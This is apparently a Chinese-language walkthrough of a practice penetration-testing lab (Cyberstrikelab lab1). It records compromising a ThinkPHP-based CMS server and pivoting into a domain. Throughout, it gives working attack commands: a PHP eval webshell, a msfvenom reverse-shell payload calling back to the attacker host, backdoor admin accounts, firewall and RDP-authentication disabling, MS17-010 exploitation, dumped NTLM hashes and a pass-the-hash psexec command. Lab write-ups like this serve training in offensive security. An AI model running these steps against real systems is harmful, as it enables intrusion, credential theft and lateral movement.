【Cyberstrikelab】lab1
因为openvpn配置只允许一台电脑进行连接,因此这里我把openvpn放到kali上,然后将kali作为代理服务器让windows进行连接,这样windows也可以使用openvpn。通过proxychains4来使用msf的socks5代理,使用psexec.py(Kali自带)使用域管理员的hash来获得192.168.20.20的会话。刚开始我是手动点击运行的,显示的是dfz用户,读取内存
环境信息

kali:172.16.233.2
内网主机扫描
sudo nmap -sS 192.168.10.0/24
扫描内网主机,存在两台服务器分别是192.168.10.10和192.168.10.233


192.168.10.10

发现是易优CMS

扫下目录,但是没什么特别的发现
gobuster dir -u http://192.168.10.10/ -w /usr/share/wordlists/dirb/small.txt -t 10 -x php,txt,html,bak,aspx,jsp --random-agent

使用fscan进行扫描,发现目标是windows 2012的服务器,并且存在thinkphp的rce漏洞


用工具检测果然存在

rce获取flag
直接执行命令获得flag


写webshell
通过cmd命令将webshell
echo ^<?php @eval($_POST['cmd']);?^> > configws.php

成功写入webshell.php


用蚁剑进行连接

收集内网信息
查看IP信息,发现还有一个内网网段192.168.20.0/24的网段

查看arp表,发现有一个192.168.20.30的主机

上线msf
先生成一个msf反向木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win2012.exe

然后将木马通过蚁剑上传

msf配置监听

然后运行在蚁剑终端运行木马
![]()
得到会话


迁移进程
然后迁移进程
run post/windows/manage/migrate
添加路由

添加用户
添加用户并添加到管理员组
net user dfz 123@abc /add
net localgroup Administrators dfz /add


打开远程桌面
尝试使用msf来开启,虽然提示错误,但是其实是成功的

也可以手动用终端开写注册表来开启远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
连接的时候出现错误

关闭防火墙
关闭主机防火墙
netsh advfirewall set allprofiles state off

修复“函数不支持”错误

直接禁用身份认证
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

成功连接远程桌面


fscan扫描内网
fscan.exe通过msf上传


发下存在主机
192.168.20.20、192.168.20.30
192.168.20.30
使用fscan对192.168.20.30进行扫描

发现存在MS17-010
MS17-010
搜索下ms17_010

msf先尝试使用下面EXP
exploit/windows/smb/ms17_010_eternalblue

再试试看
exploit/windows/smb/ms17_010_psexec

再试试看
auxiliary/admin/smb/ms17_010_command

发现是可以执行命令的

msf开启socket服务
这里我们打开msf的socket服务,这样我们通过代理可以直接访问192.168.20.30


开启远程桌面
还是刚刚一样的操作借助msf17-010命令执行,进行添加用户、添加管理组、关闭防火墙、打开远程登陆
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND 'net user dfz 123@abc /add'
set COMMAND 'net localgroup Administrators dfz /add'
set COMMAND 'netsh firewall set opmode disable'


将上面的命令都执行后,在192.168.10.10上直接登录192.168.20.30的远程桌面



这里提交的flag3
收集内网信息
通过apr -a发现还有一台192.168.20.20,这里盲猜应该是之前192.168.10.233

192.168.20.20
看了网上的wp说是要用PTH攻击,这里通过cs上线192.168.10.10和192.168.20.30,方便后续操作
CS上线192.168.10.10
先创建监听器

生成payload


通过蚁剑上传并执行

得到会话

CS上线192.168.20.30
右击刚刚上线的192.168.20.10,【Pivoting】-> 【Listener】,将该主机作为跳板

这里我将监听器的名字命名为win2008

生成payload的时候选择刚创建的监听器

生成exe木马,通过蚁剑上传

直接远程桌面,复制到192.168.20.30

刚开始我是手动点击运行的,显示的是dfz用户,读取内存凭证hash权限是不够的


这里用刚刚的msf17_010运行得到system权限的会话


PTH攻击
将域控中的Hashes 进行导出

得到Administrator的Hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:94bd5248e87cb7f2f9b871d40c903927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5bc02b7670084dd30471730cc0a1672c:::
cyberweb:1105:aad3b435b51404eeaad3b435b51404ee:2de5cd0f15d1c070851d1044e1d95c90:::
dfz:1106:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-7NRTJO59O7N$:1000:aad3b435b51404eeaad3b435b51404ee:c42def0666685723f5ad633ecef0194c:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:5da402e15f15fe70011a10a4ebea280c:::
使用msf开启socks代理



通过proxychains4来使用msf的socks5代理,使用psexec.py(Kali自带)使用域管理员的hash来获得192.168.20.20的会话
proxychains4 -q python3 psexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20

get flag

更多推荐


所有评论(0)